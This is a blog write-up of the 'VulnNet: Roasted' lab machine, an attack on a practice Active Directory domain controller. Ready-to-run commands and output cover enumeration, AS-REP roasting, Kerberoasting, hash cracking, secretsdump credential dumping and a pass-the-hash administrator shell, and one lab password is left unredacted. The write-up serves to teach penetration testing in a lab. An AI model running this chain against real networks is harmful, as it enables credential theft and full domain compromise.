VulnNet: Roasted writeup

prv
7 min readMay 17, 2021

--

I state that in this writeup the victim’s ip address changes because I had to restart the machine several times.

nmap basic results:

Starting Nmap 7.91 ( https://nmap.org ) at 2021–05–15 10:42 CEST
Nmap scan report for 10.10.33.1
Host is up (0.095s latency).
Not shown: 9988 filtered ports
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws

Then, as this is port 389 (ldap) open, I ran:

nmap -n -sV — script “ldap* and not brute” 10.10.33.1 #Using anonymous credentials

and the result is:

Starting Nmap 7.91 ( https://nmap.org ) at 2021–05–15 10:43 CEST
Nmap scan report for 10.10.33.1
Host is up (0.080s latency).
Not shown: 989 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021–05–15 08:43:16Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local, Site: Default-First-Site-Name)
| ldap-rootdse:
| LDAP Results
| <ROOT>
| domainFunctionality: 7
| forestFunctionality: 7
| domainControllerFunctionality: 7
| rootDomainNamingContext: DC=vulnnet-rst,DC=local
| ldapServiceName: vulnnet-rst.local:win-2bo8m1oe1m1$@VULNNET-RST.LOCAL
| isGlobalCatalogReady: TRUE
| supportedSASLMechanisms: GSSAPI
| supportedSASLMechanisms: GSS-SPNEGO
| supportedSASLMechanisms: EXTERNAL
| supportedSASLMechanisms: DIGEST-MD5
| supportedLDAPVersion: 3
| supportedLDAPVersion: 2
| supportedLDAPPolicies: MaxPoolThreads
| supportedLDAPPolicies: MaxPercentDirSyncRequests
| supportedLDAPPolicies: MaxDatagramRecv
| supportedLDAPPolicies: MaxReceiveBuffer
| supportedLDAPPolicies: InitRecvTimeout
| supportedLDAPPolicies: MaxConnections
| supportedLDAPPolicies: MaxConnIdleTime
| supportedLDAPPolicies: MaxPageSize
| supportedLDAPPolicies: MaxBatchReturnMessages
| supportedLDAPPolicies: MaxQueryDuration
| supportedLDAPPolicies: MaxDirSyncDuration
| supportedLDAPPolicies: MaxTempTableSize
| supportedLDAPPolicies: MaxResultSetSize
| supportedLDAPPolicies: MinResultSets
| supportedLDAPPolicies: MaxResultSetsPerConn
| supportedLDAPPolicies: MaxNotificationPerConn
| supportedLDAPPolicies: MaxValRange
| supportedLDAPPolicies: MaxValRangeTransitive
| supportedLDAPPolicies: ThreadMemoryLimit
| supportedLDAPPolicies: SystemMemoryLimitPercent
| supportedControl: 1.2.840.113556.1.4.319
| supportedControl: 1.2.840.113556.1.4.801
| supportedControl: 1.2.840.113556.1.4.473
| supportedControl: 1.2.840.113556.1.4.528
| supportedControl: 1.2.840.113556.1.4.417
| supportedControl: 1.2.840.113556.1.4.619
| supportedControl: 1.2.840.113556.1.4.841
| supportedControl: 1.2.840.113556.1.4.529
| supportedControl: 1.2.840.113556.1.4.805
| supportedControl: 1.2.840.113556.1.4.521
| supportedControl: 1.2.840.113556.1.4.970
| supportedControl: 1.2.840.113556.1.4.1338
| supportedControl: 1.2.840.113556.1.4.474
| supportedControl: 1.2.840.113556.1.4.1339
| supportedControl: 1.2.840.113556.1.4.1340
| supportedControl: 1.2.840.113556.1.4.1413
| supportedControl: 2.16.840.1.113730.3.4.9
| supportedControl: 2.16.840.1.113730.3.4.10
| supportedControl: 1.2.840.113556.1.4.1504
| supportedControl: 1.2.840.113556.1.4.1852
| supportedControl: 1.2.840.113556.1.4.802
| supportedControl: 1.2.840.113556.1.4.1907
| supportedControl: 1.2.840.113556.1.4.1948
| supportedControl: 1.2.840.113556.1.4.1974
| supportedControl: 1.2.840.113556.1.4.1341
| supportedControl: 1.2.840.113556.1.4.2026
| supportedControl: 1.2.840.113556.1.4.2064
| supportedControl: 1.2.840.113556.1.4.2065
| supportedControl: 1.2.840.113556.1.4.2066
| supportedControl: 1.2.840.113556.1.4.2090
| supportedControl: 1.2.840.113556.1.4.2205
| supportedControl: 1.2.840.113556.1.4.2204
| supportedControl: 1.2.840.113556.1.4.2206
| supportedControl: 1.2.840.113556.1.4.2211
| supportedControl: 1.2.840.113556.1.4.2239
| supportedControl: 1.2.840.113556.1.4.2255
| supportedControl: 1.2.840.113556.1.4.2256
| supportedControl: 1.2.840.113556.1.4.2309
| supportedControl: 1.2.840.113556.1.4.2330
| supportedControl: 1.2.840.113556.1.4.2354
| supportedCapabilities: 1.2.840.113556.1.4.800
| supportedCapabilities: 1.2.840.113556.1.4.1670
| supportedCapabilities: 1.2.840.113556.1.4.1791
| supportedCapabilities: 1.2.840.113556.1.4.1935
| supportedCapabilities: 1.2.840.113556.1.4.2080
| supportedCapabilities: 1.2.840.113556.1.4.2237
| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=vulnnet-rst,DC=local
| serverName: CN=WIN-2BO8M1OE1M1,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=vulnnet-rst,DC=local
| schemaNamingContext: CN=Schema,CN=Configuration,DC=vulnnet-rst,DC=local
| namingContexts: DC=vulnnet-rst,DC=local
| namingContexts: CN=Configuration,DC=vulnnet-rst,DC=local
| namingContexts: CN=Schema,CN=Configuration,DC=vulnnet-rst,DC=local
| namingContexts: DC=DomainDnsZones,DC=vulnnet-rst,DC=local
| namingContexts: DC=ForestDnsZones,DC=vulnnet-rst,DC=local
| isSynchronized: TRUE
| highestCommittedUSN: 61467
| dsServiceName: CN=NTDS Settings,CN=WIN-2BO8M1OE1M1,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=vulnnet-rst,DC=local
| dnsHostName: WIN-2BO8M1OE1M1.vulnnet-rst.local
| defaultNamingContext: DC=vulnnet-rst,DC=local
| currentTime: 20210515084321.0Z
|_ configurationNamingContext: CN=Configuration,DC=vulnnet-rst,DC=local
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local, Site: Default-First-Site-Name)
| ldap-rootdse:
| LDAP Results
| <ROOT>
| domainFunctionality: 7
| forestFunctionality: 7
| domainControllerFunctionality: 7
| rootDomainNamingContext: DC=vulnnet-rst,DC=local
| ldapServiceName: vulnnet-rst.local:win-2bo8m1oe1m1$@VULNNET-RST.LOCAL
| isGlobalCatalogReady: TRUE
| supportedSASLMechanisms: GSSAPI
| supportedSASLMechanisms: GSS-SPNEGO
| supportedSASLMechanisms: EXTERNAL
| supportedSASLMechanisms: DIGEST-MD5
| supportedLDAPVersion: 3
| supportedLDAPVersion: 2
| supportedLDAPPolicies: MaxPoolThreads
| supportedLDAPPolicies: MaxPercentDirSyncRequests
| supportedLDAPPolicies: MaxDatagramRecv
| supportedLDAPPolicies: MaxReceiveBuffer
| supportedLDAPPolicies: InitRecvTimeout
| supportedLDAPPolicies: MaxConnections
| supportedLDAPPolicies: MaxConnIdleTime
| supportedLDAPPolicies: MaxPageSize
| supportedLDAPPolicies: MaxBatchReturnMessages
| supportedLDAPPolicies: MaxQueryDuration
| supportedLDAPPolicies: MaxDirSyncDuration
| supportedLDAPPolicies: MaxTempTableSize
| supportedLDAPPolicies: MaxResultSetSize
| supportedLDAPPolicies: MinResultSets
| supportedLDAPPolicies: MaxResultSetsPerConn
| supportedLDAPPolicies: MaxNotificationPerConn
| supportedLDAPPolicies: MaxValRange
| supportedLDAPPolicies: MaxValRangeTransitive
| supportedLDAPPolicies: ThreadMemoryLimit
| supportedLDAPPolicies: SystemMemoryLimitPercent
| supportedControl: 1.2.840.113556.1.4.319
| supportedControl: 1.2.840.113556.1.4.801
| supportedControl: 1.2.840.113556.1.4.473
| supportedControl: 1.2.840.113556.1.4.528
| supportedControl: 1.2.840.113556.1.4.417
| supportedControl: 1.2.840.113556.1.4.619
| supportedControl: 1.2.840.113556.1.4.841
| supportedControl: 1.2.840.113556.1.4.529
| supportedControl: 1.2.840.113556.1.4.805
| supportedControl: 1.2.840.113556.1.4.521
| supportedControl: 1.2.840.113556.1.4.970
| supportedControl: 1.2.840.113556.1.4.1338
| supportedControl: 1.2.840.113556.1.4.474
| supportedControl: 1.2.840.113556.1.4.1339
| supportedControl: 1.2.840.113556.1.4.1340
| supportedControl: 1.2.840.113556.1.4.1413
| supportedControl: 2.16.840.1.113730.3.4.9
| supportedControl: 2.16.840.1.113730.3.4.10
| supportedControl: 1.2.840.113556.1.4.1504
| supportedControl: 1.2.840.113556.1.4.1852
| supportedControl: 1.2.840.113556.1.4.802
| supportedControl: 1.2.840.113556.1.4.1907
| supportedControl: 1.2.840.113556.1.4.1948
| supportedControl: 1.2.840.113556.1.4.1974
| supportedControl: 1.2.840.113556.1.4.1341
| supportedControl: 1.2.840.113556.1.4.2026
| supportedControl: 1.2.840.113556.1.4.2064
| supportedControl: 1.2.840.113556.1.4.2065
| supportedControl: 1.2.840.113556.1.4.2066
| supportedControl: 1.2.840.113556.1.4.2090
| supportedControl: 1.2.840.113556.1.4.2205
| supportedControl: 1.2.840.113556.1.4.2204
| supportedControl: 1.2.840.113556.1.4.2206
| supportedControl: 1.2.840.113556.1.4.2211
| supportedControl: 1.2.840.113556.1.4.2239
| supportedControl: 1.2.840.113556.1.4.2255
| supportedControl: 1.2.840.113556.1.4.2256
| supportedControl: 1.2.840.113556.1.4.2309
| supportedControl: 1.2.840.113556.1.4.2330
| supportedControl: 1.2.840.113556.1.4.2354
| supportedCapabilities: 1.2.840.113556.1.4.800
| supportedCapabilities: 1.2.840.113556.1.4.1670
| supportedCapabilities: 1.2.840.113556.1.4.1791
| supportedCapabilities: 1.2.840.113556.1.4.1935
| supportedCapabilities: 1.2.840.113556.1.4.2080
| supportedCapabilities: 1.2.840.113556.1.4.2237
| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=vulnnet-rst,DC=local
| serverName: CN=WIN-2BO8M1OE1M1,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=vulnnet-rst,DC=local
| schemaNamingContext: CN=Schema,CN=Configuration,DC=vulnnet-rst,DC=local
| namingContexts: DC=vulnnet-rst,DC=local
| namingContexts: CN=Configuration,DC=vulnnet-rst,DC=local
| namingContexts: CN=Schema,CN=Configuration,DC=vulnnet-rst,DC=local
| namingContexts: DC=DomainDnsZones,DC=vulnnet-rst,DC=local
| namingContexts: DC=ForestDnsZones,DC=vulnnet-rst,DC=local
| isSynchronized: TRUE
| highestCommittedUSN: 61467
| dsServiceName: CN=NTDS Settings,CN=WIN-2BO8M1OE1M1,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=vulnnet-rst,DC=local
| dnsHostName: WIN-2BO8M1OE1M1.vulnnet-rst.local
| defaultNamingContext: DC=vulnnet-rst,DC=local
| currentTime: 20210515084321.0Z
|_ configurationNamingContext: CN=Configuration,DC=vulnnet-rst,DC=local
3269/tcp open tcpwrapped
Service Info: Host: WIN-2BO8M1OE1M1; OS: Windows; CPE: cpe:/o:microsoft:windows

From here I could see that the domain is “vulnnet-rst.local”. So I put “10.10.33.1 vulnnet-rst.local” in my /etc/hosts file.

After, i tried to enumerate kerberos with nmap using this command:

nmap -p 88 — script=krb5-enum-users — script-args krb5-enum-users.realm=’vulnnet-rst.local’,userdb=/usr/share/seclists/Usernames/cirt-default-usernames.txt 10.10.33.1

It returns some kerberos users:

PORT STATE SERVICE
88/tcp open kerberos-sec
| krb5-enum-users:
| Discovered Kerberos principals
| Administrator@vulnnet-rst.local
| guest@vulnnet-rst.local
| Guest@vulnnet-rst.local
| administrator@vulnnet-rst.local
| GUEST@vulnnet-rst.local
|_ ADMINISTRATOR@vulnnet-rst.local

Administrator

Guest

Later I enumerate “smb” too:

smbclient -L \\\\10.10.33.1

Results:

Sharename Type Comment
— — — — — — — — — — -
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
VulnNet-Business-Anonymous Disk VulnNet Business Sharing
VulnNet-Enterprise-Anonymous Disk VulnNet Enterprise Sharing

I can access to VulnNet-Business-Anonymous and to VulnNet-Enterprise-Anonymous share and here I found .txt files. But they weren’t really useful.

Now I used impacket to find others users:

python3 lookupsid.py guest@10.10.33.1

The result is:

[*] Brute forcing SIDs at 10.10.33.1
[*] StringBinding ncacn_np:10.10.33.1[\pipe\lsarpc]
[*] Domain SID is: S-1–5–21–1589833671–435344116–4136949213
498: VULNNET-RST\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: VULNNET-RST\Administrator (SidTypeUser)
501: VULNNET-RST\Guest (SidTypeUser)
502: VULNNET-RST\krbtgt (SidTypeUser)
512: VULNNET-RST\Domain Admins (SidTypeGroup)
513: VULNNET-RST\Domain Users (SidTypeGroup)
514: VULNNET-RST\Domain Guests (SidTypeGroup)
515: VULNNET-RST\Domain Computers (SidTypeGroup)
516: VULNNET-RST\Domain Controllers (SidTypeGroup)
517: VULNNET-RST\Cert Publishers (SidTypeAlias)
518: VULNNET-RST\Schema Admins (SidTypeGroup)
519: VULNNET-RST\Enterprise Admins (SidTypeGroup)
520: VULNNET-RST\Group Policy Creator Owners (SidTypeGroup)
521: VULNNET-RST\Read-only Domain Controllers (SidTypeGroup)
522: VULNNET-RST\Cloneable Domain Controllers (SidTypeGroup)
525: VULNNET-RST\Protected Users (SidTypeGroup)
526: VULNNET-RST\Key Admins (SidTypeGroup)
527: VULNNET-RST\Enterprise Key Admins (SidTypeGroup)
553: VULNNET-RST\RAS and IAS Servers (SidTypeAlias)
571: VULNNET-RST\Allowed RODC Password Replication Group (SidTypeAlias)
572: VULNNET-RST\Denied RODC Password Replication Group (SidTypeAlias)
1000: VULNNET-RST\WIN-2BO8M1OE1M1$ (SidTypeUser)
1101: VULNNET-RST\DnsAdmins (SidTypeAlias)
1102: VULNNET-RST\DnsUpdateProxy (SidTypeGroup)
1104: VULNNET-RST\enterprise-core-vn (SidTypeUser)
1105: VULNNET-RST\a-whitehat (SidTypeUser)
1109: VULNNET-RST\t-skid (SidTypeUser)
1110: VULNNET-RST\j-goldenhand (SidTypeUser)
1111: VULNNET-RST\j-leet (SidTypeUser)

From here I found that in domain VULNNET-RST there are other users:

krbtgt

WIN-2BO8M1OE1M1$

enterprise-core-vn

a-whitehat

t-skid

j-goldenhand

j-leet

Now, putting all usernames in a file, using impacket I found “t-skid” password’s hash:

python3 /usr/local/bin/GetNPUsers.py ‘VULNNET-RST/’ -usersfile users-dict.txt -no-pass -dc-ip 10.10.223.121

Impacket v0.9.22 — Copyright 2020 SecureAuth Corporation

$krb5asrep$23$t-skid@VULNNET-RST:f2c10404a8a3f3110ab1d922a0c4ad35$b43cf4fcd7328d2601c55e4b886d2cb5b*************************************159401a88c0de903e5c6188d45f95505f3b86d585f604fb4ac9787c76b5f9a37ec5f2acd2575b977ce26819d345aa3bea1619b1d5b4f36b6c63282eb79de98d16f58da7efa0a96b001b7d0565356********************************************2c7876f8650a40d32e57001f5ac9e7457568031b9f25448aad6f17a108276b6ecad2b771e68e0fe5fd9d196240f99ff06477deeca5256e387691b768841f17b3d208c53a325e0102d782cad04c6eccf5897e9cbb5b38f05aa9763442ccaf1269b6807822bb6e56
[-] User j-goldenhand doesn’t have UF_DONT_REQUIRE_PREAUTH set
[-] User j-leet doesn’t have UF_DONT_REQUIRE_PREAUTH set
[-] User WIN-2BO8M1OE1M1$ doesn’t have UF_DONT_REQUIRE_PREAUTH set
[-] User enterprise-core-vn doesn’t have UF_DONT_REQUIRE_PREAUTH set
[-] User administrator doesn’t have UF_DONT_REQUIRE_PREAUTH set
[-] User guest doesn’t have UF_DONT_REQUIRE_PREAUTH set
[-] User a-whitehat doesn’t have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)

I saved hash in a file (“hash” file) and using john I found “t-skid” password:

# john — show hash

$krb5asrep$23$t-skid@VULNNET-RST:<REDACTED>

1 password hash cracked, 0 left

This credential was useful to gain another user’s credentials. The attack is known as KERBEROASTING. For more information I found the link below:

https://www.scip.ch/en/?labs.20181011

Then, using impacket:

python3 /usr/local/bin/GetUserSPNs.py ‘VULNNET-RST.LOCAL/t-skid:<REDACTED>’ -outputfile hash2

Now I have to crack the hash just got in the file “hash2". Using john I found “enterprise-core-vn” user’s password:

# john — show hash2
?:<REDACTED>

1 password hash cracked, 0 left

With these credentials I was able to connecting to SYSVOL share:

smbclient \\\\10.10.102.71\\SYSVOL -U enterprise-core-vn

Here I found important file in \\10.10.102.71\SYSVOL\vulnnet-rst.local\scripts\ path. The file is ResetPassword.vbs, in which I found “a-whitehat” password:

strUserNTName = “a-whitehat”
strPassword = “<REDACTED>”

Now I found in internet this:

And, after installing ruby dependencies:

gem install winrm winrm-fs stringio

and after installing evil-winrm.rb I execute the client to connect to victim with credentials found before:

root@kali:/# ./evil-winrm.rb -i 10.10.102.71 -u ‘enterprise-core-vn’ -p ‘<REDACTED>’

It works with both “enterprise-core-vn” and “a-whitehat” credentials.

Then I gain powershell shell and got user flag:

*Evil-WinRM* PS C:\Users\enterprise-core-vn\Desktop> type user.txt
THM{<REDACTED>}

For system.txt I used again impacket to obtain Administrator hash, using user “a-whitehat” credentials:

python3 /usr/local/bin/secretsdump.py ‘VULNNET-RST.LOCAL/a-whitehat:bNdKVkjv3RR9ht@10.10.193.237’

It returns:

Impacket v0.9.23.dev1+20210504.123629.24a0ae6f — Copyright 2020 SecureAuth Corporation

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xf10a2788aef5f622149a41b2c745f49a
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435***********b435b51404ee:c2597747aa5e43022a************09d:::
Guest:501:aad3b43******************1404ee:31d6cfe0d16ae**********7e0c089c0:::
DefaultAccount:503:aad3b4************b435b51404ee:31d6c***********59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn’t have hash information.
[*] Dumping cached domain logon information (domain/username:hash)

Now I can pass the Administrator hash and I did it using wmiexec.py as follow:

python3 /usr/local/bin/wmiexec.py -hashes aad3b4****04ee:c2597747aa5e430****b09d Administrator@10.10.193.237

I got administrator’s shell and so I got system flag.

Impacket v0.9.23.dev1+20210504.123629.24a0ae6f — Copyright 2020 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell — Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
vulnnet-rst\administrator

C:\>cd Users
C:\Users>cd Administrator
C:\Users\Administrator>cd Desktop
C:\Users\Administrator\Desktop>type system.txt
THM{<REDACTED>}

I like this kind of machine because they are not CTF room and in my opinion they can represent the real world in some way.

--

--